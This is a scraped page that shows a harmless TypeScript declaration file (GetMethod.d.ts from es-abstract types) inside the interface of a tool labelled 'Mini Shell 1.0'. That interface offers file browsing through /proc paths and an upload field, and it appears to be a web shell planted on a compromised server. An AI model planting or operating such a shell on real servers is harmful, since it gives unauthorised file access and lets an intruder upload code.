HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991110/task/1991110/cwd/usr/share/nodejs/@types/es-abstract/2015/
Upload File :
Current File : //proc/1991110/task/1991110/cwd/usr/share/nodejs/@types/es-abstract/2015/GetMethod.d.ts
import type { PropertyKey } from '../index';

declare function GetMethod<O, P extends PropertyKey>(
    O: O,
    P: P,
): P extends keyof O // tslint:disable-next-line: ban-types
    ? NonNullable<O[P]> extends Function
        ? O[P]
        : never
    : ((...args: any) => any) | undefined;
export = GetMethod;